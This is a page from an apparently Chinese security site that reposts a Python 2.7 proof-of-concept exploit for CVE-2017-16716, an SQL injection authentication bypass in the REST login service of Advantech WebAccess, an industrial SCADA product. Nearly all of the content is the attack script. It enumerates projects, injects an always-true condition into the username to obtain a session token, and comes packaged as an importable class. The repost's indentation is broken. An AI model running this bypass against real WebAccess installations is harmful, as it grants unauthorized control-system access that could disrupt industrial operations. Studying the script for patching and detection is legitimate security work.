首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Advantech WebAccess < 8.3 - SQL Injection
来源:@lynerc 作者:ChrisLyne 发布时间:2018-01-30  
#!/usr/bin/python2.7
 
# Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability
# Date: 01-13-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe
# Version: Advantech WebAccess 8.0-2015.08.16
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-16716
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/
 
# Notes:
#
# There are two service interfaces:
# 1) SOAP
# 2) REST
#
# This PoC targets REST
#
# The web services did not work out of the box, and a new website/app was created in IIS for testing.
# This issue was potentially due to the fact that testing was completed against a trial version.
# PoC may need slight tweaks depending on configuration of the web service.
#
# Original vulnerability was reported for more recent software version.
#
# This WebAccessAuthBypass class can be imported :-)
 
import sys, requests
from xml.etree import ElementTree
 
class WebAccessAuthBypass:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port
        self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port)
        
    def convert_entities(self, s):
    return s.replace('>', '>').replace('<', '<') # convert html entities in response, for parsing
 
    def get_project_list(self):
    print 'Getting list of projects...'
    res = requests.get(self.base_url)
    projects = list()
    if res.status_code != 200:
        print 'Bad HTTP response...'
    else:
        if 'PROJECT' not in res.text:
        print 'No projects listed by service.'
        else:
        s = self.convert_entities(res.text)
        xml = ElementTree.fromstring(s)
        for project_list in xml:
            for project in project_list:
            name = project.get('NAME')
            if name is not None:
                projects.append(name)
    if len(projects) > 0:
        print 'Found the following projects: ' + str(projects)
        return projects
    else:
        return None
 
    # returns a token
    def login(self, project):
    # SQL Injection into the user parameter
    url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x
    res = requests.get(url)
    token = None
    if res.status_code != 200:
        print 'Bad HTTP response...'
    else:
        if 'OK TOKEN' not in res.text:
        print 'No token returned by service.'
        else:
        s = self.convert_entities(res.text)
        xml = ElementTree.fromstring(s)
        if len(xml) > 0:
            token = xml[0].get('TOKEN')
    return token
 
    # token returned can be used for more transactions
    def get_token(self):
        project_list = self.get_project_list()
        project = project_list[0] # might as well pick the first project
        token = self.login(project_list[0])
        return token
 
if __name__ == "__main__":
    ip = 'targetip'
    port = 'port#'
    bypass = WebAccessAuthBypass(ip, port)
    token = bypass.get_token()
 
    if token is not None:
    print 'Successfully got an authentication token: ' + token
    else:
    print 'Unsuccessful.'
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Arq 5.10 - Local Privilege Esc
·System Shield 5.0.0.136 - Priv
·Arq 5.10 - Local Privilege Esc
·LabF nfsAxe 3.7 TFTP Client -
·macOS - 'sysctl_vfs_generic_co
·BMC BladeLogic RSCD Agent 8.3.
·Oracle WebLogic wls-wsat Compo
·Dup Scout Enterprise 10.4.16 I
·Trend Micro Threat Discovery A
·systemd Local Privilege Escala
·BMC BladeLogic 8.3.00.64 - Rem
·BMC Server Automation RSCD Age
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved